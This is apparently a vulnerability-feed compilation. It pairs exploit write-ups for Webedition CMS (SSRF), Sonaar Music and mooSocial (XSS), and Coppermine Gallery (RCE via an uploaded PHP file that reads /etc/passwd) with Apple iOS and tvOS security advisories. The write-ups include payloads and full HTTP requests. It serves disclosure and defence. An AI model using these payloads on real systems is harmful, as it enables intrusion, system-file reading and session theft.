Webedition CMS version 2.9.8.8 suffers from a blind server-side request forgery vulnerability.

    Exploit Title: Webedition CMS v2.9.8.8 - Blind SSRFApplication: Webedition CMSVersion: v2.9.8.8   Bugs:  Blind SSRFTechnology: PHPVendor URL: https://www.webedition.org/Software Link: https://download.webedition.org/releases/OnlineInstaller.tgz?p=1Date of found: 07.09.2023Author: Mirabbas AğalarovTested on: Linux 2. Technical Details & POC========================================write https://youserver/test.xml to we_cmd[0] parameterpoc requestPOST /webEdition/rpc.php?cmd=widgetGetRss&mod=rss HTTP/1.1Host: localhostContent-Length: 141sec-ch-ua: Accept: application/json, text/javascript, */*; q=0.01Content-Type: application/x-www-form-urlencoded; charset=UTF-8X-Requested-With: XMLHttpRequestsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.5790.171 Safari/537.36sec-ch-ua-platform: ""Origin: http://localhostSec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: http://localhost/webEdition/index.php?we_cmd[0]=startWEAccept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9Cookie: treewidth_main=300; WESESSION=41a9164e60666254199b3ea1cd3d2e0ad969c379; cookie=yep; treewidth_main=300Connection: closewe_cmd[0]=https://YOU-SERVER/test.xml&we_cmd[1]=111000&we_cmd[2]=0&we_cmd[3]=110000&we_cmd[4]=&we_cmd[5]=m_3

Webedition CMS 2.9.8.8 Server-Side Request Forgery

WordPress Sonaar Music plugin version 4.7 suffers from a persistent cross site scripting vulnerability.

    # Exploit Title: Wordpress Sonaar Music Plugin 4.7 - Stored XSS# Date: 2023-09-05# Exploit Author: Furkan Karaarslan# Category : Webapps# Vendor Homepage: http://127.0.0.1/wp/wordpress/wp-comments-post.php# Version: 4.7 (REQUIRED)# Tested on: Windows/Linux----------------------------------------------------------------------------------------------------1-First install sonar music plugin.2-Then come to the playlist add page. > http://127.0.0.1/wp/wordpress/wp-admin/edit.php?post_type=sr_playlist3-Press the Add new playlist button4-Put a random title on the page that opens and publish the page. > http://127.0.0.1/wp/wordpress/wp-admin/post-new.php?post_type=sr_playlist5-This is the published page http://127.0.0.1/wp/wordpress/album_slug/test/6-Let's paste our xss payload in the comment section. Payload: <script>alert("XSS")</script>BingooRequest:POST /wp/wordpress/wp-comments-post.php HTTP/1.1Host: 127.0.0.1Content-Length: 155Cache-Control: max-age=0sec-ch-ua: sec-ch-ua-mobile: ?0sec-ch-ua-platform: ""Upgrade-Insecure-Requests: 1Origin: http://127.0.0.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.5735.134 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: same-originSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentReferer: http://127.0.0.1/wp/wordpress/album_slug/test/Accept-Encoding: gzip, deflateAccept-Language: tr-TR,tr;q=0.9,en-US;q=0.8,en;q=0.7Cookie: comment_author_email_52c14530c1f3bbfa6d982f304802224a=a%40gmail.com; comment_author_52c14530c1f3bbfa6d982f304802224a=a%22%26gt%3Balert%28%29; wordpress_test_cookie=WP%20Cookie%20check; wordpress_logged_in_52c14530c1f3bbfa6d982f304802224a=hunter%7C1694109284%7CXGnjFgcc7FpgQkJrAwUv1kG8XaQu3RixUDyZJoRSB1W%7C16e2e3964e42d9e56edd7ab7e45b676094d0b9e0ab7fcec2e84549772e438ba9; wp-settings-time-1=1693936486Connection: closecomment=%3Cscript%3Ealert%28%22XSS%22%29%3C%2Fscript%3E&submit=Yorum+g%C3%B6nder&comment_post_ID=13&comment_parent=0&_wp_unfiltered_html_comment=95f4bd9cf5

WordPress Sonaar Music 4.7 Cross Site Scripting

Coppermine Gallery version 1.6.25 remote code execution exploit.

    Exploit Title: coppermine-gallery 1.6.25 RCEApplication: coppermine-galleryVersion: v1.6.25  Bugs:  RCETechnology: PHPVendor URL: https://coppermine-gallery.net/Software Link: https://github.com/coppermine-gallery/cpg1.6.x/archive/refs/tags/v1.6.25.zipDate of found: 05.09.2023Author: Mirabbas AğalarovTested on: Linux 2. Technical Details & POC========================================steps1.First of All create php file content as <?php echo system('cat /etc/passwd'); ?> and sequeze this file with zip.$ cat >> test.php <?php echo system('cat /etc/passwd'); ?>$ zip test.zip test.php1. Login to account2. Go to http://localhost/cpg1.6.x-1.6.25/pluginmgr.php3. Upload zip file4. Visit to php file   http://localhost/cpg1.6.x-1.6.25/plugins/test.phppoc requestPOST /cpg1.6.x-1.6.25/pluginmgr.php?op=upload HTTP/1.1Host: localhostContent-Length: 630Cache-Control: max-age=0sec-ch-ua: sec-ch-ua-mobile: ?0sec-ch-ua-platform: ""Upgrade-Insecure-Requests: 1Origin: http://localhostContent-Type: multipart/form-data; boundary=----WebKitFormBoundaryi1AopwPnBYPdzorFUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.5790.171 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: same-originSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentReferer: http://localhost/cpg1.6.x-1.6.25/pluginmgr.phpAccept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9Cookie: cpg16x_data=YTo0OntzOjI6IklEIjtzOjMyOiI0MmE1Njk2NzhhOWE3YTU3ZTI2ZDgwYThlYjZkODQ4ZCI7czoyOiJhbSI7aToxO3M6NDoibGFuZyI7czo3OiJlbmdsaXNoIjtzOjM6ImxpdiI7YTowOnt9fQ%3D%3D; cpg16x_fav=YToxOntpOjA7aToxO30%3D; d4e0836e1827aa38008bc6feddf97eb4=93ffa260bd94973848c10e15e50b342cConnection: close------WebKitFormBoundaryi1AopwPnBYPdzorFContent-Disposition: form-data; name="plugin"; filename="test.zip"Content-Type: application/zipPK�����™b%Wz½µ}(���(�����test.phpUT  �ñòödÓòödux���������<?php echo system('cat /etc/passwd');?>PK�����™b%Wz½µ}(���(������������¤����test.phpUT�ñòödux���������PK������N���j�����------WebKitFormBoundaryi1AopwPnBYPdzorFContent-Disposition: form-data; name="form_token"50982f2e64a7bfa63dbd912a7fdb4e1e------WebKitFormBoundaryi1AopwPnBYPdzorFContent-Disposition: form-data; name="timestamp"1693905214------WebKitFormBoundaryi1AopwPnBYPdzorF--

Coppermine Gallery 1.6.25 Remote Code Execution

Cross Site Scripting (XSS) vulnerability in mooSocial v.3.1.8 allows a remote attacker to execute arbitrary code via a crafted payload to the admin_redirect_url parameter of the user login function.

A reflected cross-site scripting (XSS) vulnerability in the **admin\_redirect\_url** parameter on user login function of mooSocial v3.1.8 which allows attackers to steal admin's session cookies and impersonate their account via a crafted URL.

    Payload : "><script>alert(1)</script> 
    FINAL Payload (URL encoded) : test%22%3e%3cscript%3ealert(1)%3c%2fscript%3etest
    

    GET /moosocial/admin/home/login?admin_redirect_url=aHR0cDovL2xvY2FsaG9zdC9tb29zb2NpYWwvYWRtaW4vcGx1Z2lucw%22%3e%3cscript%3ealert(1)%3c%2fscript%3etest HTTP/1.1
    Host: localhost
    Accept-Encoding: gzip, deflate, br
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
    Accept-Language: en-US;q=0.9,en;q=0.8
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.5938.63 Safari/537.36
    Connection: close
    Cache-Control: max-age=0
    Cookie: CAKEPHP=nidqufo1vqbqircuufs0mh98m4; 19edc47bb57545288d88183ca75c9a0bmooSocial[theme]=Q2FrZQ%3D%3D.7AxYtZYvgA%3D%3D
    Upgrade-Insecure-Requests: 1
    Referer: http://745f1976-76bd-42e5-9ece-01e2ad60316d.com/
    Sec-CH-UA: ".Not/A)Brand";v="99", "Google Chrome";v="117", "Chromium";v="117"
    Sec-CH-UA-Platform: Windows
    Sec-CH-UA-Mobile: ?0

CVE-2023-44812: GitHub - ahrixia/CVE-2023-44812: mooSocial v3.1.8 is vulnerable to cross-site scripting on Admin redirect function.

Cross Site Scripting (XSS) vulnerability in mooSocial v.3.1.8 allows a remote attacker to execute arbitrary code via a crafted payload to the mode parameter of the invite friend login function.

A reflected cross-site scripting (XSS) vulnerability in the **mode** parameter on Invite Friend function of mooSocial v3.1.8 which allows attackers to steal user's session cookies and impersonate their account via a crafted URL.

    Payload : ');alert(1)//
    FINAL Payload (URL encoded) : %27)%3balert(1)%2f%2f
    

    GET /moosocial/friends/ajax_invite?mode=model%27)%3balert(1)%2f%2f;' HTTP/1.1
    Host: localhost
    Cache-Control: max-age=0
    sec-ch-ua: "Chromium";v="117", "Not;A=Brand";v="8"
    sec-ch-ua-mobile: ?0
    sec-ch-ua-platform: "Windows"
    Upgrade-Insecure-Requests: 1
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.5938.63 Safari/537.36
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
    Sec-Fetch-Site: none
    Sec-Fetch-Mode: navigate
    Sec-Fetch-User: ?1
    Sec-Fetch-Dest: document
    Accept-Encoding: gzip, deflate, br
    Accept-Language: en-US,en;q=0.9
    Cookie: 19edc47bb57545288d88183ca75c9a0bmooSocial[activity_feed]=Q2FrZQ%3D%3D.7R9bpposmi8%3D
    Connection: close

CVE-2023-44813: GitHub - ahrixia/CVE-2023-44813: mooSocial v3.1.8 is vulnerable to cross-site scripting on Invite Friend function.

A use-after-free vulnerability exists in the MediaRecorder API of Webkit WebKitGTK 2.40.5. A specially crafted web page can abuse this vulnerability to cause memory corruption and potentially arbitrary code execution. A user would need to to visit a malicious webpage to trigger this vulnerability.

CVE-2023-39928: TALOS-2023-1831 || Cisco Talos Intelligence Group

Apple Security Advisory 2023-10-04-1 - iOS 17.0.3 and iPadOS 17.0.3 addresses buffer overflow and code execution vulnerabilities.

    -----BEGIN PGP SIGNED MESSAGE-----Hash: SHA256APPLE-SA-2023-10-04-1 iOS 17.0.3 and iPadOS 17.0.3iOS 17.0.3 and iPadOS 17.0.3 addresses the following issues.Information about the security content is also available athttps://support.apple.com/kb/HT213961.Apple maintains a Security Updates page athttps://support.apple.com/HT201222 which lists recentsoftware updates with security advisories.KernelAvailable for: iPhone XS and later, iPad Pro 12.9-inch 2nd generationand later, iPad Pro 10.5-inch, iPad Pro 11-inch 1st generation andlater, iPad Air 3rd generation and later, iPad 6th generation and later,and iPad mini 5th generation and laterImpact: A local attacker may be able to elevate their privileges. Appleis aware of a report that this issue may have been actively exploitedagainst versions of iOS before iOS 16.6.Description: The issue was addressed with improved checks.CVE-2023-42824WebRTCAvailable for: iPhone XS and later, iPad Pro 12.9-inch 2nd generationand later, iPad Pro 10.5-inch, iPad Pro 11-inch 1st generation andlater, iPad Air 3rd generation and later, iPad 6th generation and later,and iPad mini 5th generation and laterImpact: A buffer overflow may result in arbitrary code executionDescription: The issue was addressed by updating to libvpx 1.13.1.WebKit Bugzilla: 262365CVE-2023-5217This update is available through iTunes and Software Update on youriOS device, and will not appear in your computer's Software Updateapplication, or in the Apple Downloads site. Make sure you have anInternet connection and have installed the latest version of iTunesfrom https://www.apple.com/itunes/  iTunes and Software Update on thedevice will automatically check Apple's update server on its weeklyschedule. When an update is detected, it is downloaded and the optionto be installed is presented to the user when the iOS device isdocked. We recommend applying the update immediately if possible.Selecting Don't Install will present the option the next time youconnect your iOS device.  The automatic update process may take up toa week depending on the day that iTunes or the device checks forupdates. You may manually obtain the update via the Check for Updatesbutton within iTunes, or the Software Update on your device.  Tocheck that the iPhone, iPod touch, or iPad has been updated:  *Navigate to Settings * Select General * Select About. The versionafter applying this update will be "iOS 17.0.3 and iPadOS 17.0.3".All information is also posted on the Apple Security Updatesweb site: https://support.apple.com/en-us/HT201222.This message is signed with Apple's Product Security PGP key,and details are available at:https://www.apple.com/support/security/pgp/-----BEGIN PGP SIGNATURE-----iQIzBAEBCAAdFiEEsz9altA7uTI+rE/qX+5d1TXaIvoFAmUd15wACgkQX+5d1TXaIvqEoQ/+PIrFp2opkANUwD7d+pcGVnkS4fK7lGqqG6FMpuGuRhf8E+lf/SVAMzcKbXfFLhb+Fs/Z+81RKwy3xmC/kHis9K/SWaMFsTW0ctfeU83hSMIQ+JI0wvfnJy/c8thYA6u151HqJdAZKruyphTz4OEq2eUJqvPXGxiHNWyjfCacpmLnUt24WbVTL4CaGqX3tRsJLCH4XEJ/hYXNBZUolwdz4vFUG1P9OsjzOaTSIt0sVg/LZK5MTu7tcvEEBKXu9Rsfkq1KgXy6E3xo5/nkyZiMBvOLoWIPNq2BYA5Hw2V2wow6mPEpqaMPTsuFEMRJ0wqJfQwBtuRtdRt+mNJRE62+4lTfuDGEgvYlasGCqw2t180eiXQHtjoGBEwgXJ0rsjADZtTGnmEir2r/P+bRajtQRAmsVf1zhSpSksHib/3CFlin3dsLqB48lPCYy4K72u6vGrISKehm7bT3i5cxMD9ktcDEUd3TP4BjSHruttRb95UnQmQHlr6X68JAL2iT20POFpa6U8PBlgRTOKOL251lB3Ri+Q/TIO0KtTj6d6SIWAxdOyPtaHM458l3oUeexzEd7U8afA4LdITYwlETsFau/HTdky/CJjnVAaigtvnOBbrK8AIGPG2lOLwm2KiNvElbQ2M/JokxOahO/+f/PYWKOIzyVYnQA8xfP2cVSg9fqAA=eLl5-----END PGP SIGNATURE-----

Apple Security Advisory 2023-10-04-1

The issue was addressed with improved checks. This issue is fixed in iOS 17.0.3 and iPadOS 17.0.3. A local attacker may be able to elevate their privileges. Apple is aware of a report that this issue may have been actively exploited against versions of iOS before iOS 16.6.

This document describes the security content of iOS 17.0.3 and iPadOS 17.0.3.

**About Apple security updates**

For our customers' protection, Apple doesn't disclose, discuss, or confirm security issues until an investigation has occurred and patches or releases are available. Recent releases are listed on the Apple security releases page.

Apple security documents reference vulnerabilities by CVE-ID when possible.

For more information about security, see the Apple Product Security page.

**iOS 17.0.3 and iPadOS 17.0.3**

Released October 4, 2023

**Kernel**

Available for: iPhone XS and later, iPad Pro 12.9-inch 2nd generation and later, iPad Pro 10.5-inch, iPad Pro 11-inch 1st generation and later, iPad Air 3rd generation and later, iPad 6th generation and later, and iPad mini 5th generation and later

Impact: A local attacker may be able to elevate their privileges. Apple is aware of a report that this issue may have been actively exploited against versions of iOS before iOS 16.6.

Description: The issue was addressed with improved checks.

CVE-2023-42824

**WebRTC**

Available for: iPhone XS and later, iPad Pro 12.9-inch 2nd generation and later, iPad Pro 10.5-inch, iPad Pro 11-inch 1st generation and later, iPad Air 3rd generation and later, iPad 6th generation and later, and iPad mini 5th generation and later

Impact: A buffer overflow may result in arbitrary code execution

Description: The issue was addressed by updating to libvpx 1.13.1.

WebKit Bugzilla: 262365  
CVE-2023-5217

Information about products not manufactured by Apple, or independent websites not controlled or tested by Apple, is provided without recommendation or endorsement. Apple assumes no responsibility with regard to the selection, performance, or use of third-party websites or products. Apple makes no representations regarding third-party website accuracy or reliability. Contact the vendor for additional information.

Published Date: October 04, 2023

CVE-2023-42824: About the security content of iOS 17.0.3 and iPadOS 17.0.3

The issue was addressed with improved checks. This issue is fixed in iOS 16.7.1 and iPadOS 16.7.1. A local attacker may be able to elevate their privileges. Apple is aware of a report that this issue may have been actively exploited against versions of iOS before iOS 16.6.

This document describes the security content of iOS 16.7.1 and iPadOS 16.7.1.

**About Apple security updates**

For our customers' protection, Apple doesn't disclose, discuss, or confirm security issues until an investigation has occurred and patches or releases are available. Recent releases are listed on the Apple security releases page.

Apple security documents reference vulnerabilities by CVE-ID when possible.

For more information about security, see the Apple Product Security page.

**iOS 16.7.1 and iPadOS 16.7.1**

Released October 10, 2023

**Kernel**

Available for: iPhone 8 and later, iPad Pro (all models), iPad Air 3rd generation and later, iPad 5th generation and later, and iPad mini 5th generation and later

Impact: A local attacker may be able to elevate their privileges. Apple is aware of a report that this issue may have been actively exploited against versions of iOS before iOS 16.6.

Description: The issue was addressed with improved checks.

CVE-2023-42824

**WebRTC**

Available for: iPhone 8 and later, iPad Pro (all models), iPad Air 3rd generation and later, iPad 5th generation and later, and iPad mini 5th generation and later

Impact: A buffer overflow may result in arbitrary code execution

Description: The issue was addressed by updating to libvpx 1.13.1.

WebKit Bugzilla: 262365  
CVE-2023-5217

Information about products not manufactured by Apple, or independent websites not controlled or tested by Apple, is provided without recommendation or endorsement. Apple assumes no responsibility with regard to the selection, performance, or use of third-party websites or products. Apple makes no representations regarding third-party website accuracy or reliability. Contact the vendor for additional information.

Published Date: October 10, 2023

CVE-2023-42824: About the security content of iOS 16.7.1 and iPadOS 16.7.1

Apple Security Advisory 09-26-2023-9 - tvOS 17 addresses bypass, code execution, out of bounds read, and use-after-free vulnerabilities.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

APPLE-SA-09-26-2023-9 tvOS 17

tvOS 17 addresses the following issues.  
Information about the security content is also available at  
https://support.apple.com/kb/HT213936.

Apple maintains a Security Updates page at  
https://support.apple.com/HT201222 which lists recent  
software updates with security advisories.

Airport  
Available for: Apple TV HD and Apple TV 4K (all models)  
Impact: An app may be able to read sensitive location information  
Description: A permissions issue was addressed with improved redaction  
of sensitive information.  
CVE-2023-40384: Adam M.

App Store  
Available for: Apple TV HD and Apple TV 4K (all models)  
Impact: A remote attacker may be able to break out of Web Content  
sandbox  
Description: The issue was addressed with improved handling of  
protocols.  
CVE-2023-40448: w0wbox

Apple Neural Engine  
Available for: Apple TV HD and Apple TV 4K (all models)  
Impact: An app may be able to execute arbitrary code with kernel  
privileges  
Description: The issue was addressed with improved memory handling.  
CVE-2023-40432: Mohamed GHANNAM (@_simo36)  
CVE-2023-41174: Mohamed GHANNAM (@_simo36)  
CVE-2023-40409: Ye Zhang (@VAR10CK) of Baidu Security  
CVE-2023-40412: Mohamed GHANNAM (@_simo36)

Apple Neural Engine  
Available for: Apple TV HD and Apple TV 4K (all models)  
Impact: An app may be able to execute arbitrary code with kernel  
privileges  
Description: A use-after-free issue was addressed with improved memory  
management.  
CVE-2023-41071: Mohamed GHANNAM (@_simo36)

Apple Neural Engine  
Available for: Apple TV HD and Apple TV 4K (all models)  
Impact: An app may be able to disclose kernel memory  
Description: The issue was addressed with improved memory handling.  
CVE-2023-40399: Mohamed GHANNAM (@_simo36)

Apple Neural Engine  
Available for: Apple TV HD and Apple TV 4K (all models)  
Impact: An app may be able to disclose kernel memory  
Description: An out-of-bounds read was addressed with improved input  
validation.  
CVE-2023-40410: Tim Michaud (@TimGMichaud) of Moveworks.ai

AuthKit  
Available for: Apple TV HD and Apple TV 4K (all models)  
Impact: An app may be able to access user-sensitive data  
Description: The issue was addressed with improved handling of caches.  
CVE-2023-32361: Csaba Fitzl (@theevilbit) of Offensive Security

Bluetooth  
Available for: Apple TV HD and Apple TV 4K (all models)  
Impact: An attacker in physical proximity can cause a limited out of  
bounds write  
Description: The issue was addressed with improved checks.  
CVE-2023-35984: zer0k

bootp  
Available for: Apple TV HD and Apple TV 4K (all models)  
Impact: An app may be able to read sensitive location information  
Description: A privacy issue was addressed with improved private data  
redaction for log entries.  
CVE-2023-41065: Adam M., and Noah Roskin-Frazee and Professor Jason Lau  
(ZeroClicks.ai Lab)

CFNetwork  
Available for: Apple TV HD and Apple TV 4K (all models)  
Impact: An app may fail to enforce App Transport Security  
Description: The issue was addressed with improved handling of  
protocols.  
CVE-2023-38596: Will Brattain at Trail of Bits

CoreAnimation  
Available for: Apple TV HD and Apple TV 4K (all models)  
Impact: Processing web content may lead to a denial-of-service  
Description: The issue was addressed with improved memory handling.  
CVE-2023-40420: 이준성(Junsung Lee) of Cross Republic

Dev Tools  
Available for: Apple TV HD and Apple TV 4K (all models)  
Impact: An app may be able to gain elevated privileges  
Description: This issue was addressed with improved checks.  
CVE-2023-32396: Mickey Jin (@patch1t)

Game Center  
Available for: Apple TV HD and Apple TV 4K (all models)  
Impact: An app may be able to access contacts  
Description: The issue was addressed with improved handling of caches.  
CVE-2023-40395: Csaba Fitzl (@theevilbit) of Offensive Security

GPU Drivers  
Available for: Apple TV HD and Apple TV 4K (all models)  
Impact: An app may be able to disclose kernel memory  
Description: The issue was addressed with improved memory handling.  
CVE-2023-40391: Antonio Zekic (@antoniozekic) of Dataflow Security

Kernel  
Available for: Apple TV HD and Apple TV 4K (all models)  
Impact: An attacker that has already achieved kernel code execution may  
be able to bypass kernel memory mitigations  
Description: The issue was addressed with improved memory handling.  
CVE-2023-41981: Linus Henze of Pinauten GmbH (pinauten.de)

Kernel  
Available for: Apple TV HD and Apple TV 4K (all models)  
Impact: An app may be able to execute arbitrary code with kernel  
privileges  
Description: The issue was addressed with improved memory handling.  
CVE-2023-41984: Pan ZhenPeng (@Peterpan0927) of STAR Labs SG Pte. Ltd.

Kernel  
Available for: Apple TV HD and Apple TV 4K (all models)  
Impact: An app may be able to access sensitive user data  
Description: A permissions issue was addressed with improved validation.  
CVE-2023-40429: Michael (Biscuit) Thomas and 张师傅(@京东蓝军)

libpcap  
Available for: Apple TV HD and Apple TV 4K (all models)  
Impact: A remote user may cause an unexpected app termination or  
arbitrary code execution  
Description: This issue was addressed with improved checks.  
CVE-2023-40400: Sei K.

libxpc  
Available for: Apple TV HD and Apple TV 4K (all models)  
Impact: An app may be able to delete files for which it does not have  
permission  
Description: A permissions issue was addressed with additional  
restrictions.  
CVE-2023-40454: Zhipeng Huo (@R3dF09) of Tencent Security Xuanwu Lab  
(xlab.tencent.com)

libxpc  
Available for: Apple TV HD and Apple TV 4K (all models)  
Impact: An app may be able to access protected user data  
Description: An authorization issue was addressed with improved state  
management.  
CVE-2023-41073: Zhipeng Huo (@R3dF09) of Tencent Security Xuanwu Lab  
(xlab.tencent.com)

libxslt  
Available for: Apple TV HD and Apple TV 4K (all models)  
Impact: Processing web content may disclose sensitive information  
Description: The issue was addressed with improved memory handling.  
CVE-2023-40403: Dohyun Lee (@l33d0hyun) of PK Security

Maps  
Available for: Apple TV HD and Apple TV 4K (all models)  
Impact: An app may be able to read sensitive location information  
Description: The issue was addressed with improved handling of caches.  
CVE-2023-40427: Adam M., and Wojciech Regula of SecuRing  
(wojciechregula.blog)

MobileStorageMounter  
Available for: Apple TV HD and Apple TV 4K (all models)  
Impact: A user may be able to elevate privileges  
Description: An access issue was addressed with improved access  
restrictions.  
CVE-2023-41068: Mickey Jin (@patch1t)

Photos Storage  
Available for: Apple TV HD and Apple TV 4K (all models)  
Impact: An app may be able to access edited photos saved to a temporary  
directory  
Description: The issue was addressed with improved checks.  
CVE-2023-40456: Kirin (@Pwnrin)  
CVE-2023-40520: Kirin (@Pwnrin)

Pro Res  
Available for: Apple TV HD and Apple TV 4K (all models)  
Impact: An app may be able to execute arbitrary code with kernel  
privileges  
Description: The issue was addressed with improved memory handling.  
CVE-2023-41063: Certik Skyfall Team

Sandbox  
Available for: Apple TV HD and Apple TV 4K (all models)  
Impact: An app may be able to overwrite arbitrary files  
Description: The issue was addressed with improved bounds checks.  
CVE-2023-40452: Yiğit Can YILMAZ (@yilmazcanyigit)

Simulator  
Available for: Apple TV HD and Apple TV 4K (all models)  
Impact: An app may be able to gain elevated privileges  
Description: The issue was addressed with improved checks.  
CVE-2023-40419: Arsenii Kostromin (0x3c3e)

StorageKit  
Available for: Apple TV HD and Apple TV 4K (all models)  
Impact: An app may be able to read arbitrary files  
Description: This issue was addressed with improved validation of  
symlinks.  
CVE-2023-41968: Mickey Jin (@patch1t), James Hutchins

WebKit  
Available for: Apple TV HD and Apple TV 4K (all models)  
Impact: Processing web content may lead to arbitrary code execution  
Description: The issue was addressed with improved checks.  
WebKit Bugzilla: 256551  
CVE-2023-41074: 이준성(Junsung Lee) of Cross Republic and me Li

WebKit  
Available for: Apple TV HD and Apple TV 4K (all models)  
Impact: Processing web content may lead to arbitrary code execution  
Description: The issue was addressed with improved memory handling.  
WebKit Bugzilla: 239758  
CVE-2023-35074: Abysslab Dong Jun Kim(@smlijun) and Jong Seong  
Kim(@nevul37)

Additional recognition

Airport  
We would like to acknowledge Adam M., and Noah Roskin-Frazee and  
Professor Jason Lau (ZeroClicks.ai Lab) for their assistance.

AppSandbox  
We would like to acknowledge Kirin (@Pwnrin) for their assistance.

Audio  
We would like to acknowledge Mickey Jin (@patch1t) for their assistance.

Bluetooth  
We would like to acknowledge Jianjun Dai and Guang Gong of 360  
Vulnerability Research Institute for their assistance.

Control Center  
We would like to acknowledge Chester van den Bogaard for their  
assistance.

Kernel  
We would like to acknowledge Bill Marczak of The Citizen Lab at The  
University of Toronto's Munk School and Maddie Stone of Google's Threat  
Analysis Group, 永超 王 for their assistance.

libxml2  
We would like to acknowledge OSS-Fuzz, Ned Williamson of Google Project  
Zero for their assistance.

libxpc  
We would like to acknowledge an anonymous researcher for their  
assistance.

libxslt  
We would like to acknowledge Dohyun Lee (@l33d0hyun) of PK Security,  
OSS-Fuzz, and Ned Williamson of Google Project Zero for their  
assistance.

NSURL  
We would like to acknowledge Zhanpeng Zhao (行之) and 糖豆爸爸(@晴天组织) for  
their assistance.

Photos  
We would like to acknowledge Dawid Pałuska and Kirin (@Pwnrin) for their  
assistance.

Photos Storage  
We would like to acknowledge Wojciech Regula of SecuRing  
(wojciechregula.blog) for their assistance.

Power Services  
We would like to acknowledge Mickey Jin (@patch1t) for their assistance.

Shortcuts  
We would like to acknowledge Alfie Cockell Gwinnett, Christian Basting  
of Bundesamt für Sicherheit in der Informationstechnik, Cristian Dinca  
of "Tudor Vianu" National High School of Computer Science, Romania,  
Giorgos Christodoulidis, Jubaer Alnazi of TRS Group Of Companies,  
KRISHAN KANT DWIVEDI, and Matthew Butler for their assistance.

Software Update  
We would like to acknowledge Omar Siman for their assistance.

Spotlight  
We would like to acknowledge Abhay Kailasia (@abhay_kailasia) of Lakshmi  
Narain College Of Technology Bhopal, and Dawid Pałuska for their  
assistance.

StorageKit  
We would like to acknowledge Mickey Jin (@patch1t) for their  
assistance. 

WebKit  
We would like to acknowledge Khiem Tran, Narendra Bhati From Suma Soft  
Pvt. Ltd, and an anonymous researcher for their assistance.

Wi-Fi  
We would like to acknowledge Wang Yu of Cyberserval for their  
assistance.

Apple TV will periodically check for software updates. Alternatively,  
you may manually check for software updates by selecting "Settings ->  
System -> Software Update -> Update Software."  To check the current  
version of software, select "Settings -> General -> About."  
All information is also posted on the Apple Security Updates  
web site: https://support.apple.com/en-us/HT201222.

This message is signed with Apple's Product Security PGP key,  
and details are available at:  
https://www.apple.com/support/security/pgp/  
-----BEGIN PGP SIGNATURE-----

iQIzBAEBCAAdFiEEsz9altA7uTI+rE/qX+5d1TXaIvoFAmUTSJoACgkQX+5d1TXa  
IvpJvw/+OKqntqggqPkx4TXqH+nCchp4wj3KCjmdtULgoYL2BStw+jXAl9Z/Wnyi  
uhg7YgboJb+jFc2UbYNG/w6Ks4qnh1P/4xwd8KfiGH+u0pblR24DDyNOPA6X+F4c  
CJ2jfagKi7xOM/Djm0mkrkZ1PeiXkx5k4bBLL+I8ckadCZinecn0tZur0gwAzN/y  
e113vKgGJDvVn257inJ063d7d+R4gdDNznMq4Mg5+gtbWoz9OZ6gHiTj+u8jwrlh  
+10ZOBtTHGQ612OptUB2FcyLn439CQhftHlc91L5Am2HsduesB6MBmtiZlfFMaca  
P8Vur6sh/k34roqaWVW2ljvMkqZMJSocTgjzMsVN87itikXT9ua5HbcInnkCMx+A  
8gtOnogY/lsm446Qu0mH0MYAZLSbQ9OYzJor9fax9PV+ysmOGn2SfM2o6DKPXjCE  
74+yFAiv+lo3yrr68SQea/PiDxhMt7+i/Ia7vO5gg1HkqANFc0//KC2pObdGSNu6  
cWJQUcGqOvU/jqnIO9WLXRnSDdXsRGLJ8xXSAYL8M2FdW5Md/tvQ3/p+/6kwXfnq  
cXwM/92G0mx1GFeapToP0NCjUwx4ARCw9d1Y+5keZ4gRaVOJzy/96WKzbc5blVGH  
C5RT/4ty1vpgbCcI8kmDt0WD2nvTnwoNgBaEti/iC3Lzu+M52wA=  
=Zq9i  
-----END PGP SIGNATURE-----

Tag

#webkit